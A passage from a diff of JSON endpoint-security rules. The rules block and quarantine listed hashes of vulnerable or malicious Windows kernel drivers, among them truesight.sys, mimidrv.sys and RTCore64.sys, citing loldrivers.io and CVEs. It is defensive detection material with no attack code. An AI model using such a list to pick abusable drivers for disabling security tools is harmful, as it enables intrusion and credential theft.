SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8cc53f01-1a89-5a5c-8434-235fc4898f77", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819191Z", + "creation_date": "2026-03-23T11:45:31.819193Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819198Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a19007ece916157952ff5cda5bf0b4342d2f009a7d368aaa29c169d3794d9016", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8cc581fb-33c6-5ade-8fab-557e913534f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500176Z", + "creation_date": "2026-03-23T11:45:31.500179Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500188Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f0f4c9253ff3380224484a8a9ef15971dbaffbed1d09a7e0ee48fdfca3d1501d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ccfd284-a8b7-5204-9cd3-d8d7f0b87b43", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469008Z", + "creation_date": "2026-03-23T11:45:30.469011Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469020Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b4ac66225600b3d5b89f6b0440ccdd0f59279fd0bbf4af82f1aab63df54b883", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8cd3943a-5473-5e11-a399-4c88312d1f49", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466072Z", + "creation_date": "2026-03-23T11:45:30.466075Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466084Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12b0000698b79ea3c8178b9e87801cc34bad096a151a8779559519deafd4e3f0", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8cd599b5-6587-5d02-8242-09eeaac6cdf1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827893Z", + "creation_date": "2026-03-23T11:45:30.827895Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827900Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "415fa8623e0e8ec991093365cfce3a913f8711198fcf2e7ffb4d59712348ab67", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8cd82f15-0280-5a9b-82c2-debf16e530e8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458664Z", + "creation_date": "2026-03-23T11:45:30.458667Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458676Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1204026fdc9c859960ee561eb9f1fd9ebf6c88c78c5d4cee35ef029ad5050ec6", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8cf64ce4-eb07-5796-b0e6-321ee2f458da", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148224Z", + "creation_date": "2026-03-23T11:45:31.148226Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148231Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a2a2374a88951cdf69c9215659bf9dd12125669e4143df3c574a2041ddafb92", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d026852-d879-546f-b98c-1641dd8d3047", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810254Z", + "creation_date": "2026-03-23T11:45:31.810256Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e0cda9601a0a53bdc07b9c678de3571ca33666cf354a7ef36a2939107bfd7ca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d0c765d-ca1d-5c84-8c33-0d57bfc984a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978423Z", + "creation_date": "2026-03-23T11:45:29.978425Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978431Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b019ebd77ac19cdd72bba3318032752649bd56a7576723a8ae1cccd70ee1e61a", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d15a630-c118-57f1-8d0d-15e963aaac2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453577Z", + "creation_date": "2026-03-23T11:45:30.453581Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453590Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e556fc49ab6caeb5b835abf683ff04a39f0e467ea5607187c8b2fcf2ca77314", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d1d9d93-9a73-5fb6-8235-a9f944c04526", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495390Z", + "creation_date": "2026-03-23T11:45:31.495393Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28aeefa1f2d98aef61a1c972f4b3d2ef759301440f78e74cca16ef96c9d23f32", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d24d0eb-1a5a-5982-a2d3-756332791807", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983703Z", + "creation_date": "2026-03-23T11:45:29.983705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54bc506b2f0cf66d12d4a2415ab743c2b2a1f3079089e3e0c0c1f3f49dd7335e", + "comment": "Vulnerable Kernel Driver (aka WCPU.sys) [https://www.loldrivers.io/drivers/7f645b95-4374-47ae-be1a-e4415308b550/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d30dbe7-3f97-5ca9-b7c2-16a18c094cb7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607668Z", + "creation_date": "2026-03-23T11:45:29.607670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7da6113183328d4fddf6937c0c85ef65ba69bfe133b1146193a25bcf6ae1f9dd", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d474abf-c415-5088-8ecf-aee802e4ff47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828973Z", + "creation_date": "2026-03-23T11:45:30.828975Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828981Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ad8e224c4c5fd1698b9898e9003a18edee6e44dac2e778a269b121a9f722ae0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d50322e-9191-5266-b667-464e4ffbdc7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971908Z", + "creation_date": "2026-03-23T11:45:29.971910Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971915Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ae3056a475fbf96c109185a3a44abe8a5af461cb9310370f595adda1ce2df28", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d584675-f651-54e3-82fc-f59a68718bdf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151841Z", + "creation_date": "2026-03-23T11:45:31.151845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50cb1ea20990e0fc95cefd5354f857eb21724f637f807b885722515fa0b3d9fe", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d70af87-1e2a-5462-9ca6-d74a1864b714",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973739Z",
+ "creation_date": "2026-03-23T11:45:29.973740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ffdde6bc6784c13c601442e47157062941c47015891e7139c2aaba676ab59cc",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8d761b0e-c6a1-5c3f-b5b2-ee58319a695c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+
"last_update": "2026-03-23T11:45:30.460096Z", + "creation_date": "2026-03-23T11:45:30.460099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460108Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22e125c284a55eb730f03ec27b87ab84cf897f9d046b91c76bea2b5809fd51c5", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d86abc2-7479-5ba2-be36-627be8b90423", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145697Z", + "creation_date": "2026-03-23T11:45:32.145700Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1afc1d0672c14df8c9e4caa88f5d3b7968421d72c548b6df307e371b9a8776d5", + "comment": "Malicious Kernel Driver (aka driver_1afc1d06.sys) [https://www.loldrivers.io/drivers/d7773616-9860-4768-b6a2-d74f32c23b4e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d86ba3b-abe2-514b-a706-d87ab491adec", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606575Z", + "creation_date": "2026-03-23T11:45:29.606577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4533a11f4f190354b749f2842b57233e5e9e8b37fa4031bcb976118cff902101", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d8883da-1a6e-566c-b1e9-11b057207a62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143148Z", + "creation_date": "2026-03-23T11:45:31.143150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143155Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "002b9b5e83fb76da6e3e98c7de0f515de55429059026b03fd3bc8973f9227857", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8d9005c2-cc7c-5318-b64a-0313f39b3aa2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491494Z", + "creation_date": "2026-03-23T11:45:31.491497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491505Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe0b4f7ebed27bedbab89926bd7637f91963b4c7364709f68ead295ee89660e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8da0ebde-0443-5844-98ea-10362b3afd71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.603902Z", + "creation_date": "2026-03-23T11:45:29.603904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.603910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdf49774a13d717c1f0b84bf82f4d9ec652994a475f0b8a0a3ab685cd5fd74a4", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8dbad857-0663-55e4-9e0f-c36d79768c6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146673Z", + "creation_date": "2026-03-23T11:45:31.146675Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146681Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
